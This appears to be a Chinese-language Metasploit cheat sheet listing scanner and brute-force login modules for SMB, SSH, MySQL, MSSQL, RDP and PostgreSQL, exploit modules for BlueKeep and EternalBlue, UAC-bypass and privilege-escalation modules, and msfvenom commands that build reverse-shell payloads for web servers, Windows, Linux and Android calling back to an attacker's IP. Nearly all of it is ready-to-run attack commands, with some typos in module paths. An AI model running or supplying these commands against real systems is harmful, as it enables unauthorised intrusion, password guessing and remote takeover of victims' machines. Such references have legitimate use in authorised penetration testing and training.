MSF
端口-服务模块
arp扫描
auxiliary/scanner/discovery/arp_sweep
smb服务扫描
auxiliary/scancer/smb/smb_version
端口扫描
auxiliary/scanner/portscan/syn
telent服务扫描
auxiliary/scanner/telnet/telnet_version
rdp服务扫描
auxiliary/scanner/rdp/rdp_scanner
ssh主机扫描
auxiliary/scanner/ssh/ssh_version Use
SSH爆破
uxiliary/scanner/ssh/ssh_login
Mysql爆破
auxiliary/scanner/mysql/mysql_login
Mysql服务扫描
auxiliary/scanner/mysql/mysql_version
MSSQL爆破
auxiliary/scanner/mssql/mssql_login
PostgreSQL
auxiliary/scanner/postgres/postgres_version
auxiliary/scanner/postgres/postgres_login
漏洞模块
CVE-2019-0708
扫描模块
auxiliary/scanner/rdp/cve_2019_0708_bluekeep
攻击模块
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
ms17-010
扫描模块
auxiliary/scanner/smb/smb_ms17_010
攻击模块
exploit/windows/smb/ms17_010_eternalblue
CVE-2012-2122
auxiliary/admin/mysql/mysql_enum
Shell生成模块
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[ip] LPORT=[Port] R >text.jsp
php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
Shell反弹模块
exploit/multi/handler
set payload php/meterpreter/reverse_tcp | set PAYLOAD java/jsp_shell_reverse_tcp
提权模块
Mysql数据库提权
UDF提权
Metasploit提供的exploit适应于5.5.9以下
Mof提权 exploit/windows/mysql/mysql_mof
UAC提权
exploit/windows/local/bypassuac exploit/windows/local/bypassuac_fodhelper exploit/windows/local/bypassuac_comhijack exploit/windows/local/bypassuac_eventvwr 通过incognito中的add_localgroup_user提权 域提权 - ms13-081、ms15-051、ms16-032、MS16-016、MS14-068、ms18_8120_win32k_privesc
问题
(1)[-] Handler failed to bind to 192.168.1.211:4444:- -重启msf
